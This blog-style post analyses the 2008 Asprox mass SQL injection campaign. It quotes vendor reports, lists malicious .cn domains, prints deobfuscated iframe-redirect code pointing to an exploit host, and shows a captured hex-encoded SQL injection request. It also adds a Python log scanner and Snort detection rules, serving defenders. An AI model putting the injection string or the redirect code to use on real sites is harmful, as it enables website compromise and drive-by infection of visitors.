
Warning: I strongly suggest that readers do NOT visit websites mentioned here. They should be considered dangerous and capable of infecting your system.
Several websites were warning us that the SQL injections are still increasing in number and that other domain names are being used for the injection. For example, F-Secure has this to say:

Previously, these attacks have primarily pointed to IP addresses in China and we've seen the following domains being used in addition to the ones we've mentioned previously:

www.wowgm1.cn
www.killwow1.cn
www.wowyeye.cn
vb008.cn
9i5t.cn
computershello.cn

We've now seen other domains being used as well such as direct84.com which is inserted by an SQL injection tool (detected as HackTool:W32/Agent.B) distributed to the Asprox botnet. SecureWorks has a nice write-up available. The direct84.com domain fast-fluxes to several different IPs in Europe, Israel and North America.

SANS ISC had the following interesting bit to add:

So the results are in and the count is in the hundreds of thousands infected with the "m.js" javascript. After deobfuscating the code, we get this:

if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe src=http://www.ririwow.cn/index.htm width=100 height=0></iframe>");}

In other words, the code checks if the system language variable is set to ZH-CN (which is set on systems running in Chinese) and redirects you to the site hosting the exploit only if that is not true. So the rant might really be from the author after all, since the code is attacking all non-Chinese machines. Are we getting more serious with this, or is the bottom line still (and only) information stealing and money?

How considerate, or should I say patriotic.
Infected .be sites amounted to 96 at the moment. There aren't that many, but we are amongst the victims. I notified the Belnet CERT as soon as I could.
The attack request looks more or less like this:

GET /page.asp?id=425;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C00410052004500200www.example.com HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Accept-Language: en-gb
Accept-Encoding: deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.25
Host: www.example.com
Connection: Close

A strange thing to note is that both Firefox and Opera appear together in the User-Agent string. There has been a similar attack targeting World of Warcraft forums that also links to .cn (Chinese) domains. Read the analysis on shadowserver.org.
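As an added example (not code from the original post or from any of the vendors quoted), a small Python scanner that flags the request pattern shown above in web server access logs and decodes the hex blob the way SQL Server does, as UTF-16LE text. The combined log format, the IP addresses and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Shape of the injected T-SQL in the captured request: DECLARE/SET of a variable whose value
# is a hex literal CAST to a string; SQL Server reads that literal as UTF-16LE text.
CAST_HEX = re.compile(
    r"DECLARE\s+@(\w+)\s+N?VARCHAR\s*\(\s*\d+\s*\)\s*;\s*SET\s+@\1\s*=\s*CAST\s*\(\s*0x([0-9A-Fa-f]+)",
    re.IGNORECASE,
)
# The oddity the post points out: Firefox and Opera tokens in one User-Agent string.
MIXED_UA = re.compile(r"Firefox/.*Opera|Opera.*Firefox/")
# Combined log format (assumed): request in the first quoted field, user agent in the last.
LOG_LINE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"')

def decode_hex_sql(hex_digits: str) -> str:
    """Decode a CAST(0x...) literal the way SQL Server does: raw bytes read as UTF-16LE.
    A truncated capture can end mid-byte or mid-character; drop the remainder, don't raise."""
    raw = bytes.fromhex(hex_digits[: len(hex_digits) // 2 * 2])
    return raw[: len(raw) // 2 * 2].decode("utf-16-le", errors="replace")

def inspect_log_line(line: str):
    """Return a finding dict for a log line carrying the CAST-hex injection pattern, else None."""
    m = LOG_LINE.search(line)
    if not m:
        return None
    target = unquote_plus(m.group("target"))  # %20 and friends must be decoded before matching
    hit = CAST_HEX.search(target)
    if not hit:
        return None
    return {
        "path": target.split("?", 1)[0],
        "variable": "@" + hit.group(1),
        "decoded_sql": decode_hex_sql(hit.group(2)),
        "mixed_user_agent": bool(MIXED_UA.search(m.group("ua"))),
    }

# Constructed sample lines (not real traffic). The first mirrors the captured request: its hex
# is built from the SQL text that blob decodes to, plus a stray nibble to mimic the cut capture.
HIDDEN_SQL = "DECLARE @T varchar(255),@C varchar(255) DECLARE "
PAYLOAD_HEX = HIDDEN_SQL.encode("utf-16-le").hex().upper() + "0"
SAMPLE_LOG = [
    '203.0.113.9 - - [22/Jun/2008:09:14:31 +0200] "GET /page.asp?id=425;DECLARE%20@S%20NVARCHAR(4000);'
    'SET%20@S=CAST(0x' + PAYLOAD_HEX + ' HTTP/1.1" 200 4123 "-" '
    '"Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.25"',
    '198.51.100.4 - - [22/Jun/2008:09:15:02 +0200] "GET /page.asp?id=425 HTTP/1.1" 200 4123 "-" '
    '"Mozilla/5.0 (Windows NT 5.1; rv:1.8.0) Gecko/20060728 Firefox/1.5.0"',
    '198.51.100.7 - - [22/Jun/2008:09:15:40 +0200] "GET /search.asp?q=DECLARE%20cheese HTTP/1.1" '
    '200 900 "-" "Opera/9.25 (Windows NT 5.1; U; en)"',
]
```

Only the first sample line yields a finding; the decoded text is what the hex in the request above stands for, which is what an analyst wants to see rather than the blob itself.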
SecureWorks gives us Snort rules to detect the bot spreading by email:

The following Snort signatures could be used to reliably detect spam coming into an MTA from an Asprox bot:

alert tcp any any -> any 25 (msg:"Asprox-style Message ID"; flags:A+; dsize:<80; reference:url,www.secureworks.com/research/threats/danmecasprox; sid:1001290; rev:1;)

alert tcp any any -> any 25 (msg:"Asprox phishing email detected"; flags:A+; content:"From|3a20|"; depth:6; content:"|0d0a|Bcc|3a20|"; within:150; flowbits:isset,asproxmessageid; reference:url,www.secureworks.com/research/threats/danmecasprox; sid:1001291; rev:1;)
Note that these signatures do not guarantee detection of future variants or attacks. As reproduced here, the second rule only fires once the asproxmessageid flowbit has been set, so it cannot be used on its own.